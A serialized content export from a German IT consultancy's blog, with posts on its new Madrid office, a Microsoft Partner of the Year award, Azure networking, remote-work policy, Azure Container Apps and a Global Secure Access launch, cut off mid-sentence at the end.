Spanien","2024-05-27",[410],[10043,10045,10047,10049,10051],{"img":10044,"cloudinary":415},"/blog/heads/head-spain-reserved.png",{"img":10046,"cloudinary":415},"/blog/heads/head-spain-temperature.png",{"img":10048,"cloudinary":415},"/blog/heads/head-spain-hacker.png",{"img":10050,"cloudinary":415},"/v1716790294/blog/heads/head-spain-cyperattack.png",{"img":10052,"cloudinary":415},"/blog/heads/head-spain-pronunciation.png","head-spain-reserved","/heads/head-spain-reserved.png","Spanien war für uns Deutsche schon immer ein ganz besonderes Land mit ganz besonderen Erlebnissen. Wer von uns hat nicht den ersten elternfreien Urlaub seines Lebens an den Stränden der Costa Brava verbracht (Lloret de Mar, Blanes, Santa Susanna)? Wer erinnert sich nicht an herrlich entspannte Strandtage? An heiße Sommer? An Olé und o weh bei der WM 82? An leckere Meeresfrüchte (und so richtig original echte Paella)? An Villariba und Villabacho? An dieses ganz einmalige Spanienfeeling? Wir haben uns dran erinnert – und jetzt unseren eignen Spanientraum wahr gemacht!","glueckkanja, Madrid, Deutsches Unternehmen in Spanien, Cybersecurity, Microsoft, German Engineering, glueckkanja Iberica",{"quote":415,"infos":10058},{"headline":10059,"subline":10060,"level":2548,"textStyling":9489,"flush":9490,"person":10061,"form":10070},"Jetzt Kontakt aufnehmen","Sie möchten wissen, was wir für Sie in Spanien tun können? Wir beraten Sie gerne zur unseren Services und Technologien und freuen uns auf Ihre Kontaktaufnahme!",{"image":10062,"cloudinary":415,"alt":230,"name":230,"quotee":230,"quoteeTitle":10063,"quote":10064,"detailsHeader":9496,"details":10065},"/people/people-juan-jose-fernandez.jpg","Regional Sales Manager","Unser neues Büro in Madrid verbindet deutsche Präzision mit spanischer Leidenschaft für unsere schlanken, innovativen Sicherheitslösungen, die bei unseren Kunden Vertrauen schaffen und auf lokalen Wurzeln basieren.",[10066,10069],{"text":10067,"href":10068,"details":9501,"icon":9502},"+34 680 225643","tel:+34 680 225643",{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":10071,"method":407,"action":9511,"fields":10072},{"skin":9510},[10073,10074,10075,10076,10077,10079,10081],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":9516},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":9520},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":9524},{"label":9526,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":10078},"Anfrage Services in Spanien",{"type":9531,"id":9535,"value":10080},"gk-in-spain",{"type":9531,"id":9538},[10083,10085],{"lang":2118,"href":10084},"/blog/corporate/2024/05/gk-in-spain-en",{"lang":9114,"href":10086},"/blog/corporate/2024/05/gk-in-spain-es",{"slick":415,"form":415},"/posts/2024-05-27-gk-in-spain",{"title":9998,"description":402},"posts/2024-05-27-gk-in-spain",[1117,10092,422],"Spain","d5UEwL5rK1KrApMaWmQ_e1EG-0ovERVYiR6qtXMIX6U",{"id":10095,"title":10096,"author":10097,"body":10098,"cta":3,"description":10102,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":10115,"moment":10117,"navigation":415,"path":10161,"seo":10162,"stem":10163,"tags":10164,"webcast":406,"__hash__":10165},"content_de/posts/2024-06-26-partner-of-the-year-2024.md","Partner of the Yeah, Yeah, Yeah, Year!",[191],{"type":350,"value":10099,"toc":10113},[10100,10103,10106],[353,10101,10102],{},"Seit heute ist es offiziell: Wir sind auch in diesem Jahr Microsoft Partner of the Year! In einem weltweiten Feld von Top-Microsoft-Partnern wurden wir auch 2024 für unsere herausragenden Leistungen und innovativen Kundenlösungen auf der Basis von Microsoft-Technologien geehrt. Mehr als 4.700 Nominierungen gab es insgesamt, Microsoft-Partner aus über 100 Ländern haben teilgenommen – und wir stehen ganz oben auf dem Treppchen! Dafür sagen wir „Danke!“ an das gesamte Microsoft Team. Es ist immer wieder schön zu wissen, dass und wie ihr die Arbeit für unsere Kunden wertschätzt. Wir alle bei glueckkanja sind mega happy, euch als Partner an unserer Seite zu haben!",[353,10104,10105],{},"Bekommen haben wir die diesjährige „Partner of the Year“ Auszeichnung übrigens für die Umgestaltung der digitalen Arbeitsbereiche bei einer norddeutschen Bank. Challenge war es hier, im Bereich der Endpoint-Management-Lösungen neue Standards für Innovation und Agilität zu setzen. Mit unseren selbstentwickelten, cloudbasierten Arbeitsplatzlösungen auf Basis von Microsoft E5 und Windows 365 konnten wir Sicherheit, Effizienz und Zufriedenheit verbessern – und gleichzeitig die Kosten senken sowie die Produktivität steigern. Damit haben wir nicht nur den digitalen Arbeitsbereich des Kunden neu definiert, sondern uns auch als Marktführer für moderne Endpoint-Management-Lösungen positioniert. Falls ihr mehr über unseren „Partner of the Year“ Case und unsere Auszeichnung erfahren möchtet, stellen wir euch den Transformationsprozess gerne auch einmal persönlich vor.",[353,10107,10108,10109,10112],{},"Wir gehen jetzt erstmal feiern – und empfehlen an dieser Stelle die vollständige Liste aller Gewinner und Finalisten, die ihr ",[374,10110,1491],{"href":10111},"https://aka.ms/2024POTYAWinnersFinalists"," findet. Nochmals herzlichen Glückwunsch an alle Gewinner und Finalisten von uns.",{"title":402,"searchDepth":403,"depth":403,"links":10114},[],{"seoTitle":10116,"titleClass":7896,"date":10117,"categories":10118,"blogtitlepic":10119,"socialimg":10120,"customExcerpt":10121,"keywords":10122,"contactInContent":10123,"hreflang":10155,"scripts":10160},"glueckkanja ist Microsoft Partner of the Year 2024","2024-06-26",[410],"head-partner-of-the-year-2024","/heads/head-partner-of-the-year-2024.jpg","Einmal ist keinmal und mit fünf zählt man zum Establishment. Was aber sagt man zur insgesamt achten Auszeichnung zum Microsoft „Partner of the Year“? Wir sagen dazu: Partner of the Yeah, Yeah, Yeah, Year!","POY, Award, Microsoft Partner of the Year 2024, Transformationprozess, Endpoint Management, Microsoft E5, Windows 365, Country Partner of the Year",{"quote":415,"infos":10124},{"bgColor":10125,"color":10126,"boxBgColor":10127,"boxColor":10128,"headline":10129,"subline":10130,"level":2548,"textStyling":9489,"flush":9490,"person":10131,"form":10139},"var(--color-secondary)","var(--color-copy)","var(--color-blue-medium)","var(--color-white)","Jetzt Kontakt aufnahmen","Ihr möchtet mehr über unseren Case und unsere Auszeichnung erfahren? Wir stellen euch den Transformationsprozess gerne persönlich vor und freuen uns auf eure Kontaktaufnahme!",{"image":10132,"cloudinary":415,"alt":149,"name":149,"quotee":149,"quoteeTitle":10133,"quote":10134,"detailsHeader":10135,"details":10136},"/people/people-christian-kanja.jpg","CEO","Diese Auszeichnung ist nicht nur eine Ehre, sondern ein Ansporn. Herzlichen Dank an unser fantastisches glueckanja Team, die großartige Zusammenarbeit mit unseren Kunden und natürlich unsere Teammates bei Microsoft. Zusammen haben wir Großes erreicht und noch Größeres vor.","Wir freuen uns darauf,\u003Cbr />von euch zu hören!",[10137,10138],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":10140,"method":407,"action":9511,"fields":10141},{"skin":9510},[10142,10144,10146,10148,10150,10152,10154],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},"Bitte Namen eingeben.",{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},"Bitte Unternehmen eingeben.",{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},"Bitte E-Mail-Adresse eingeben.",{"label":10149,"type":9527,"id":9528,"required":415,"requiredMsg":9529},"Eure Daten werden zur Bearbeitung und Beantwortung eurer Anfrage bei uns gespeichert. Weitere Informationen zum Datenschutz findet ihr in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.",{"type":9531,"id":9532,"value":10151},"Anfrage POY Case",{"type":9531,"id":9535,"value":10153},"gkgab-contact-form",{"type":9531,"id":9538},[10156,10158],{"lang":2118,"href":10157},"/blog/corporate/2024/06/partner-of-the-year-2024-en",{"lang":9114,"href":10159},"/blog/corporate/2024/06/partner-of-the-year-2024-es",{"slick":415,"form":415},"/posts/2024-06-26-partner-of-the-year-2024",{"title":10096,"description":10102},"posts/2024-06-26-partner-of-the-year-2024",[3933,3934],"Ij6FAHRm_Tu4oq90N6FHHHuHEvowVSbMucnInvsu564",{"id":10167,"title":10168,"author":10169,"body":10170,"cta":3,"description":10174,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":10192,"moment":10194,"navigation":415,"path":10223,"seo":10224,"stem":10225,"tags":10226,"webcast":406,"__hash__":10228},"content_de/posts/2024-07-02-azure-network-management.md","Netzwerk-Management in Azure: Freiheiten & Feinheiten",[130],{"type":350,"value":10171,"toc":10190},[10172,10175,10178,10181,10184,10187],[353,10173,10174],{},"Häufig sehen wir bei Kundenprojekten eine Vielzahl von Netzwerkimplementierungen in der Cloud. Einige Kunden setzen dabei auf völlig unabhängige Network Stacks zur Bereitstellung von IaaS-Diensten in Azure, wie beispielsweise virtuelle Server. Andere nutzen klassische, netzwerkunabhängige PaaS- und SaaS-Dienste, die über das Internet oder das Microsoft-Backbone-Netzwerk über einen öffentlichen Endpunkt zugänglich sind. Der Versuch, On-Premises-Netzwerkumgebungen in die Cloud zu adaptieren, ist ebenfalls ein verbreiteter Ansatz, der jedoch oft unnötige Komplexität und Probleme mit sich bringt. Es ist deutlich, dass die Ansätze vielfältig sind und die Implementierungsmöglichkeiten ebenso komplex.",[353,10176,10177],{},"Eine sorgfältige Planung ist in Azure grundsätzlich wichtig, doch nicht unveränderlich. Um eine hybride Infrastruktur aufzubauen, sollte eine Überschneidung von IP-Adressbereichen in Cloud und On-Premises vermieden werden. Neben solchen grundlegenden Entscheidungen können jederzeit vielfältige Lösungen implementiert werden. Services wie die Azure Firewall bieten in verschiedenen Leistungsstufen hervorragenden Edge-Security-Service für ausgehenden und eingehenden Verkehr. Es besteht kein Bedarf, Third-Party-NVA-Lösungen einzusetzen oder den Traffic zu einer On-Premises-Firewall umzuleiten, was hohe Kosten verursachen kann. Das Azure Application Gateway mit WAF (Web Application Firewall) bietet eine ausgezeichnete Lösung für das sichere Bereitstellen von Internet-facing-Webservices, ähnlich einer vereinfachten DMZ. Neuerdings können auch andere Ports als die reinen Web-Service-Ports wie Port 80 und 443 veröffentlicht und gesichert werden.",[353,10179,10180],{},"Es ist auch möglich, Azure-Dienste, die sonst über einen rein öffentlichen Endpunkt bereitgestellt würden, als interne Dienste mit privaten Endpunkten anzubieten. Der öffentliche Endpunkt kann dabei deaktiviert und durch einen privaten Endpunkt ersetzt werden, der eine Netzwerkschnittstelle und somit eine private IP-Adresse bereitstellt. Der Traffic verlässt dann nicht die eigene Netzwerkumgebung und ist nicht öffentlich zugänglich. Dies erhöht die Sicherheit der Dienste, allerdings sollte der Traffic stets sorgfältig reguliert werden, etwa durch eine Azure Firewall oder, einfacher, mit Network Security Groups.",[353,10182,10183],{},"Azure bietet auch für die Vernetzung von On-Premises-Rechenzentren, Niederlassungen oder Benutzerclients zahlreiche Möglichkeiten. ExpressRoute bietet einen schnellen und zuverlässigen Service mit geringen Latenzen, obwohl er kostenintensiv ist. Außerdem gibt es klassische Site-to-Site-Verbindungen basierend auf VPN, für die verschiedene Gateway-Größen verfügbar sind. Auch Client-to-Azure-Verbindungen basierend auf zertifikatsbasierter oder EntraID-basierter Authentifizierung sind möglich.",[353,10185,10186],{},"Der Virtual WAN-Service von Microsoft vereinfacht das globale Management des Netzwerkstacks erheblich und zentralisiert viele sonstige Konfigurationen, wie die globale und regionale Routingkonfiguration und -propagation. Dabei lassen sich auch Services wie Third-Party-Firewalls oder Azure-Dienste wie Azure Firewall und Gateways schnell und einfach implementieren und verwalten.",[353,10188,10189],{},"Zusammenfassend lässt sich sagen, dass Azure eine breite Palette an Netzwerkdiensten bietet, die hohe Anfangsinvestitionen unnötig machen und die Nutzungshürden deutlich senken. Dennoch muss für das allgemeine Netzwerkdesign und die lösungsspezifische Anpassung bei einzelnen Anwendungen sorgfältig geprüft werden, welche Lösungen am besten geeignet sind. Gerne unterstützen wir euch mit unserer Erfahrung bei der Gestaltung des optimalen Netzwerkdesigns.",{"title":402,"searchDepth":403,"depth":403,"links":10191},[],{"seoTitle":10193,"titleClass":7896,"date":10194,"categories":10195,"blogtitlepic":10196,"socialimg":10197,"customExcerpt":10198,"keywords":10199,"contactInContent":10200,"hreflang":10219,"scripts":10222},"Netzwerkstrategien in Azure: Optimierung von Cloud-Implementierungen","2024-07-02",[1773],"head-azure-network-management","/blog/heads/head-azure-network-management.jpg","Entdeckt die Flexibilität und Sicherheit von Azure Netzwerklösungen! Azure bietet eine breite Palette an Netzwerkdiensten, die sowohl für IaaS- als auch für PaaS- und SaaS-Anwendungen konzipiert sind. Von der Implementierung unabhängiger Network Stacks über die Sicherung der Daten mit Azure Firewall bis hin zur Einrichtung von privaten Endpunkten, die Dienste intern verfügbar machen – Azure erleichtert den Aufbau einer sicheren und effizienten 100% Cloud als auch hybriden Infrastruktur. Lasst uns euch helfen, die Komplexität zu reduzieren und euer Netzwerkdesign optimal an eure Bedürfnisse anzupassen.","Azure Cloud Services, Netzwerk-Stacks in Azure, Hybrid Cloud Integration, Azure IaaS, Cloud-Sicherheitslösungen, Azure Netzwerkoptimierung, PaaS und SaaS in Azure, Azure Firewall, Private Endpoints Azure, Netzwerkkonfiguration Azure",{"quote":406,"infos":10201},{"bgColor":10125,"color":10126,"boxBgColor":10127,"boxColor":10128,"headline":10129,"subline":10202,"level":2548,"textStyling":9489,"flush":9490,"person":10203,"form":10208},"Möchtet ihr mehr über das Azure Netzwerkmanagement erfahren? Gerne stellen wir euch unseren Ansatz persönlich vor und unterstützen euch mit unserer Erfahrung bei der Gestaltung des optimalen Netzwerkdesigns. Wir freuen uns auf eure Kontaktaufnahme!",{"image":10204,"cloudinary":415,"alt":9758,"name":9758,"detailsHeader":10135,"details":10205},"/people/people-pam-team.png",[10206,10207],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":10209,"method":407,"action":9511,"fields":10210},{"skin":9510},[10211,10212,10213,10214,10215,10217,10218],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":10149,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":10216},"Anfrage Azure Network Management",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},[10220],{"lang":2118,"href":10221},"/blog/azure/2024/07/azure-network-management-en",{"slick":415,"form":415},"/posts/2024-07-02-azure-network-management",{"title":10168,"description":10174},"posts/2024-07-02-azure-network-management",[1773,9994,6132,10227],"IaaS Solutions","reCknE8jzr7YY_iViafexn41-5uoqu_cdYScae-KaBE",{"id":10230,"title":10231,"author":10232,"body":10233,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":10266,"moment":10268,"navigation":415,"path":10280,"seo":10281,"stem":10282,"tags":10283,"webcast":406,"__hash__":10284},"content_de/posts/2024-07-08-homeoffice.md","Weil das Was mehr zählt als das Wo",[235],{"type":350,"value":10234,"toc":10263},[10235,10239,10242,10245,10248,10251],[629,10236,10238],{"id":10237},"bei-glueckkanja-kannst-du-weiterhin-multimobil-arbeiten","Bei glueckkanja kannst du weiterhin multimobil arbeiten.",[353,10240,10241],{},"Im Gegensatz zu vielen anderen IT-Unternehmen kannst du bei uns deshalb nach wie vor so mobil arbeiten, wie du es kennst und in den letzten Jahren liebgewonnen hast. Abgesehen von den besseren Arbeitsergebnissen sprechen unserer Meinung nach noch viele weitere Gründe für Homeoffice und multimobiles Arbeiten. Weniger Stress, bessere Vereinbarkeit von Beruf und Familie, optimale Work-Life-Balance, mehr Flexibilität und spürbar mehr Lebenszeit, weil lange Arbeitswege wegfallen, sind nur einige davon.",[353,10243,10244],{},"Zu diesem Thema konnte übrigens auch die TU Darmstadt in einer Umfrage zwischen Dezember 2022 und März 2023 spannende Erkenntnisse gewinnen. Nach eigener Einschätzung sind über 75% der Beschäftigten in Büroberufen im Homeoffice effektiv. 60% sagen, dass sie im Homeoffice erfolgreicher arbeiten und zudem zufriedener sind. Über 40% würden sogar kündigen, wenn sie wieder ausschließlich im Büro arbeiten müssten.",[353,10246,10247],{},"Für uns ist diese Umfrage eine Bestätigung unserer Meinung. Deshalb werden wir an unserer freien Arbeitsplatzwahl auch weiterhin festhalten. Damit stellen wir uns klar gegen den aktuellen Trend unserer Branche, wieder verstärkt auf starre Office-Regelungen mit wenig Flexibilität zu setzen. Falls das ein Trend sein sollte, dem du auch nicht folgen möchtest, hätten wir an dieser Stelle etwas Spannendes für dich: unsere offenen Stellen!",[353,10249,10250],{},"Hier gibt’s die flexiblen Jobs mit ganz viel Work-Life-Balance:",[2559,10252,10255],{"className":10253},[7988,7989,10254,7991],"mt-2",[374,10256,10260],{"role":7994,"className":10257,"dataText":10258,"href":10259,"type":8004},[7996,7997,7998,7999,8000,8001],"Zu den Stellenanzeigen","/de/stellenanzeigen",[7258,10261,10258],{"className":10262},[8008],{"title":402,"searchDepth":403,"depth":403,"links":10264},[10265],{"id":10237,"depth":704,"text":10238},{"seoTitle":10267,"titleClass":7896,"date":10268,"categories":10269,"blogtitlepic":10270,"socialimg":10271,"customExcerpt":10272,"keywords":10273,"hreflang":10274,"scripts":10279},"Multimobil arbeiten bei glueckkanja: Weniger Stress und bessere Work-Life-Balance","2024-07-08",[410],"head-homeoffice","/blog/heads/head-homeoffice.png","Hast du schon einmal etwas von Albert Einsteins Schreibtisch-Lampe gehört? Weißt du, wie sie aussieht? Rund oder eckig? Mit einem grünen Schirm oder schlicht in Metall? Nein? Noch nie? Keine Sorge: Wir auch nicht. Und das hat seinen guten Grund: Es ist schlichtweg völlig egal, unter welchem Licht oder in welcher Umgebung man seine genialen Einfälle hat – das Einzige, was zählt, ist die Qualität der Ideen.","Homeoffice-Jobs, Flexibles Arbeiten, Work-Life-Balance, Beruf und Familie vereinbaren, Remote arbeiten, Multimobiles Arbeiten, Stressfreies Arbeiten, Arbeitsplatzwahl, Zufriedenheit im Homeoffice, IT-Unternehmen Jobs",[10275,10277],{"lang":2118,"href":10276},"/blog/corporate/2024/07/homeoffice-en",{"lang":9114,"href":10278},"/blog/corporate/2024/07/homeoffice-es",{"slick":415,"form":415},"/posts/2024-07-08-homeoffice",{"title":10231,"description":402},"posts/2024-07-08-homeoffice",[474,2540,4097,5346],"Trv8zpkUzQ-OqAi-F8gTCLiNmHJtZ_DWorOQnjnnxT0",{"id":10286,"title":10287,"author":10288,"body":10289,"cta":3,"description":10293,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":10421,"moment":10423,"navigation":415,"path":10454,"seo":10455,"stem":10456,"tags":10457,"webcast":406,"__hash__":10461},"content_de/posts/2024-07-12-containers-on-azure.md","Azure Container Services – Modern, effizient und unverzichtbar",[240],{"type":350,"value":10290,"toc":10415},[10291,10294,10297,10300,10304,10306,10309,10312,10342,10345,10348,10352,10354,10357,10363,10366,10369,10372,10375,10379,10381,10384,10390,10399,10405,10408,10410,10412],[353,10292,10293],{},"In unserer schnelllebigen Welt sind Unternehmen ständig mit neuen Herausforderungen konfrontiert, die schnelle und flexible Lösungen erfordern. Eine Schlüsseltechnologie, die diesen Anforderungen gerecht wird, sind Container. Sie ermöglichen es, Softwareentwicklungs- und Bereitstellungsprozesse effizient zu gestalten und an das rasante Tempo der digitalen Transformation anzupassen.",[353,10295,10296],{},"Container, die Grundbausteine moderner CI/CD-Workflows, bieten eine minimalistische und effiziente Laufzeitumgebung, die nur die essenziellen Komponenten zur Ausführung einer Anwendung beinhaltet. Durch die Trennung von zusätzlichen Bestandteilen, die vom Hostsystem bereitgestellt werden, verkürzen Container die Start- und Aktualisierungszeiten erheblich.",[353,10298,10299],{},"Es stellt sich nun die Frage, wie dieses Potenzial am besten genutzt und gemanagt werden kann.",[2548,10301,10303],{"id":10302},"container-lösungen-auf-azure","Container Lösungen auf Azure",[353,10305,9352],{},[353,10307,10308],{},"Microsoft Azure bietet eine breite Palette an Möglichkeiten, Container zu betreiben. Die Optionen reichen von Full Managed Solutions, bei denen Microsoft einen Großteil der Infrastrukturkonfiguration übernimmt, bis hin zu Light Managed Solutions, bei denen das Management und die Pflege des Hostsystems in eigener Verantwortung liegen.",[353,10310,10311],{},"Hier eine Auflistung der Container Hosting Möglichkeiten auf Azure von Light to Full Managed:",[367,10313,10314,10321,10328,10335],{},[370,10315,10316],{},[374,10317,10320],{"href":10318,"rel":10319},"https://learn.microsoft.com/en-us/azure/aks/what-is-aks",[378],"Azure Kubernetes Services (AKS)",[370,10322,10323],{},[374,10324,10327],{"href":10325,"rel":10326},"https://learn.microsoft.com/en-us/azure/container-instances/container-instances-overview",[378],"Azure Container Instances (ACI)",[370,10329,10330],{},[374,10331,10334],{"href":10332,"rel":10333},"https://azure.microsoft.com/en-us/products/app-service/containers/?activetab=pivot:deploytab",[378],"Azure WebApp for Containers",[370,10336,10337],{},[374,10338,10341],{"href":10339,"rel":10340},"https://learn.microsoft.com/en-us/azure/container-apps/overview",[378],"Azure Container Apps (ACA)",[353,10343,10344],{},"Jeder dieser Dienste bietet seine eigenen Vorteile, abhängig vom geplanten Einsatzszenario.",[353,10346,10347],{},"Die Azure Container Registry (ACR) ermöglicht die zentrale Speicherung von Containern in der eigenen Azure-Umgebung und bietet eine integrierte Lösung, um ACR als Quelle für die verwendeten Container-Images zu nutzen.",[2548,10349,10351],{"id":10350},"spotlight-azure-container-apps","Spotlight: Azure Container Apps",[353,10353,9352],{},[353,10355,10356],{},"Die neueste Hosting-Option für Container von Microsoft sind die Azure Container Apps (ACA). Im Vergleich zu AKS übernimmt Microsoft hier das komplette Management des darunterliegenden Kubernetes, inklusive Updates, Upgrades und Skalierung.",[353,10358,10359],{},[356,10360],{"alt":10361,"src":10362},"Container Apps Basic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-container-apps-example-scenarios.png",[353,10364,10365],{},"Als Grundlage dient ein sogenanntes Azure Container App Environment, bei dem Microsoft vollständig verwaltete Kubernetes-Ressourcen bereitstellt, die von den Applikationen genutzt werden können. Unterschiedliche Workload-Profile bieten verschiedene Kombinationen aus CPU/RAM und auch die Nutzung von GPU-Systemen.",[353,10367,10368],{},"Der Hauptvorteil dieser Lösung liegt darin, dass man sich lediglich auf seine Anwendung und die applikationsspezifische Konfiguration konzentrieren muss, ohne sich um das Clustermanagement kümmern zu müssen.",[353,10370,10371],{},"ACA bieten vielseitige Möglichkeiten, Anwendungen einfach mit weiteren Azure-Services zu verbinden. So können zum Beispiel FileShares aus einem Azure Storage Account in die eigenen Container eingebunden werden, um persistente Daten zwischen Neustarts oder Versionswechseln der Anwendung zu sichern.",[353,10373,10374],{},"Ein weiteres Feature von ACA ist das sogenannte A/B- oder Green/Blue-Testing, bei dem zwei Versionen einer Anwendung gleichzeitig betrieben werden. Der eingehende Traffic wird zwischen den laufenden Instanzen aufgeteilt, was schnelle Erkenntnisse über den aktuellen Entwicklungsstand ermöglicht und es erlaubt, Bugs direkt zu beheben.",[2548,10376,10378],{"id":10377},"beispiel-aus-der-praxis-github-runner-on-azure-container-apps","Beispiel aus der Praxis: GitHub Runner on Azure Container Apps",[353,10380,9352],{},[353,10382,10383],{},"Ein praktisches Beispiel: CI/CD-Workflows benötigen eine Umgebung, in der sie ausgeführt werden können. GitHub sowie Azure DevOps und andere Anbieter stellen öffentliche Agents zur Verfügung, auf denen die Workflows ausgeführt werden können. Diese Runner werden von GitHub verwaltet und kommunizieren über öffentliche Endpunkte. Benötigt man jedoch Zugriff auf interne Ressourcen oder möchte nicht auf öffentlichen Systemen arbeiten, lassen sich diese Runner auch im eigenen Netzwerk betreiben.",[353,10385,10386],{},[356,10387],{"alt":10388,"src":10389},"GitHub Workflow Classic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-basic.png",[353,10391,10392,10393,10398],{},"Traditionell wurden hierfür 24/7 laufende virtuelle Maschinen verwendet. Azure Container Apps bieten eine kosteneffiziente und skalierbare Alternative. Durch die Nutzung von KEDA (",[374,10394,10397],{"href":10395,"rel":10396},"https://keda.sh/",[378],"Kubernetes Event Driven Autoscaler",") wird eine Verbindung zur eigenen GitHub-Umgebung aufgebaut. ACA überwacht, ob ein Workflow gestartet wurde, startet einen Container zur Ausführung des Workflows und entfernt ihn anschließend wieder. Läuft kein Workflow, wird auch kein Container gestartet, was die Kosten niedrig hält.",[353,10400,10401],{},[356,10402],{"alt":10403,"src":10404},"GitHub Workflow with Container Apps","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-container-app.png",[353,10406,10407],{},"Die Skalierbarkeit der Lösung ist ein weiterer Vorteil, da für jeden Workflow eine eigenständige Containerinstanz erstellt wird. Im Vergleich zu einer virtuellen Maschine, wo meist nur ein einzelner Agent einen Workflow bedient, bietet dies eine flexible und effiziente Alternative.",[2548,10409,1746],{"id":1745},[353,10411,9352],{},[353,10413,10414],{},"Container bieten eine hervorragende Möglichkeit, die eigene Entwicklung und das Deployment von Applikationen zu modernisieren. Microsoft Azure bietet mit seinem umfangreichen Portfolio an Services die passende Lösung, egal ob man selbst das Management übernehmen möchte oder sich vollständig auf die eigene Applikation konzentrieren will.",{"title":402,"searchDepth":403,"depth":403,"links":10416},[10417,10418,10419,10420],{"id":10302,"depth":403,"text":10303},{"id":10350,"depth":403,"text":10351},{"id":10377,"depth":403,"text":10378},{"id":1745,"depth":403,"text":1746},{"seoTitle":10422,"titleClass":7896,"date":10423,"categories":10424,"blogtitlepic":10425,"socialimg":10426,"customExcerpt":10427,"keywords":10428,"contactInContent":10429,"hreflang":10448,"scripts":10453},"Optimierung des Cloud-Deployments: Container-Lösungen auf Azure im Überblick","2024-07-15",[1773],"head-containers-on-azure","/blog/heads/head-containers-on-azure.jpg","Schneller, schlanker, effizienter - die Container-Technologie transformiert die Art und Weise, wie Unternehmen Software entwickeln und bereitstellen. Erfahrt mehr darüber, wie Microsoft Azure als führende Plattform für das Hosting von Containern dient und wie sie die Agilität und Skalierbarkeit von Anwendungen entscheidend verbessern kann.","Azure Container Solutions, Microsoft Azure, Container-Technologie, CI/CD-Integration, Kubernetes Management, Anwendungsdeployment, Cloud-Dienste, Softwareentwicklung, skalierbare Infrastruktur, DevOps-Tools",{"quote":406,"infos":10430},{"bgColor":10125,"color":10126,"boxBgColor":10127,"boxColor":10128,"headline":10129,"subline":10431,"level":2548,"textStyling":9489,"flush":9490,"person":10432,"form":10437},"Möchtet ihr mehr über Container auf Azure erfahren? Wir stellen euch gerne unseren Ansatz persönlich vor und unterstützen euch mit unserer Erfahrung bei der Implementierung von Container-Lösungen. Wir freuen uns auf eure Kontaktaufnahme!",{"image":10204,"cloudinary":415,"alt":9758,"name":9758,"detailsHeader":10135,"details":10433},[10434,10435],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9492,"href":10436,"icon":9506},"mailto:sales@glueckkanja.com",{"ctaText":9508,"cta":10438,"method":407,"action":9511,"fields":10439},{"skin":9510},[10440,10441,10442,10443,10444,10446,10447],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":10149,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":10445},"Anfrage Container Lösungen",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},[10449,10451],{"lang":2118,"href":10450},"/blog/azure/2024/07/containers-on-azure-en",{"lang":9114,"href":10452},"/blog/azure/2024/07/containers-on-azure-es",{"slick":415,"form":415},"/posts/2024-07-12-containers-on-azure",{"title":10287,"description":10293},"posts/2024-07-12-containers-on-azure",[1773,10458,10459,10460],"Cloud Technologie","Development","CI/CD-Workflow","mOEwgxrCfHXi5_unDjeU_oUnFSIfqCwKouO2UvnFwBg",{"id":10463,"title":10464,"author":10465,"body":10466,"cta":3,"description":10578,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":10579,"moment":10581,"navigation":415,"path":10614,"seo":10615,"stem":10616,"tags":10617,"webcast":406,"__hash__":10620},"content_de/posts/2024-07-18-gsa-launch-partner.md","glueckkanja ist Launch Partner für Microsofts SSE-Lösung",[102],{"type":350,"value":10467,"toc":10573},[10468,10477,10485,10488,10491,10495,10497,10500,10507,10510,10524,10528,10530,10533,10536,10544,10550,10553,10556,10562,10564,10568,10570],[353,10469,10470,10471,10476],{},"glueckkanja freut sich bekannt zu geben, dass wir als einer der ",[374,10472,10475],{"href":10473,"rel":10474},"https://learn.microsoft.com/en-us/entra/global-secure-access/how-to-find-microsoft-services-partners",[378],"Product Launch Partners"," für Microsofts neueste Security Service Edge (SSE) Lösung, Global Secure Access, ausgewählt wurden. Diese Lösung umfasst Microsoft Entra Internet & Private Access und setzt neue Maßstäbe in der Cloud-Sicherheit.",[353,10478,10479,10480,10484],{},"Mit unserer langjährigen Erfahrung im 100% cloudbasierten Ansatz sind wir ideal positioniert, um Unternehmen bei der Implementierung von Zero Trust Architekturen zu unterstützen. ",[374,10481,10483],{"href":10482},"/de/security/global-secure-access/","Global Secure Access"," integriert sich nahtlos in unsere bestehenden Strategien und ergänzt unser Portfolio an modernen Arbeitsplatz- und identitätszentrierten Sicherheitslösungen. Von Proof of Concept bis hin zu Managed Services bieten wir eine durchgängige Begleitung.",[353,10486,10487],{},"In zahlreichen Workplace und Security Projekten haben wir bereits erfolgreich die physische Trennung von Clients und Rechenzentren realisiert. Ein moderner, vollständig cloudbasierter Client beseitigt jedoch nicht automatisch veraltete Strukturen; ein Zugriff 